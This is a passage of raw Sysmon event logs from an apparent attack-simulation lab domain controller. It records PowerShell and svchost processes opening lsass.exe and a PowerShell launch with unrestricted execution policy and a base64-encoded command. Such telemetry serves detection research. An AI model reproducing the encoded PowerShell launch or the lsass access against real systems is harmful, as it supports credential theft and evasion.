indows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311cacd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311ca2a7(wow64) 154100x80000000000000003249Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.942{D28789B6-7CA8-5FA1-9C00-000000008801}4444C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA7-5FA1-A343-060000000000}0x643a30HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003248Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.920{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003247Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.920{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003246Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.920{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003245Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.873{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003244Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.873{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003243Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.842{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qwkleg5r.edz.ps12020-11-03 15:52:08.842 354300x80000000000000003242Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:06.755{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruetrue0:0:0:0:0:0:0:1win-dc-807.attackrange.local50316-true0:0:0:0:0:0:0:1win-dc-807.attackrange.local47001- 10341000x80000000000000003241Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.826{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003240Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7CA7-5FA1-9200-000000008801}5048668C:\Windows\system32\conhost.exe{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003239Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003238Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003237Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003236Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003235Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003234Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003233Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.811{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003232Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.795{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003231Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.795{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003230Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.795{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003229Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.795{D28789B6-7CA8-5FA1-9A00-000000008801}49922748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31d4331b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311a4a0c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31202edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e6540|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e63d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311d8356|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e4889|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e447c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e41a5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311e3e76|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31c954db|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311cacd7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+311ca2a7 154100x80000000000000003228Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:08.809{D28789B6-7CA8-5FA1-9B00-000000008801}4644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 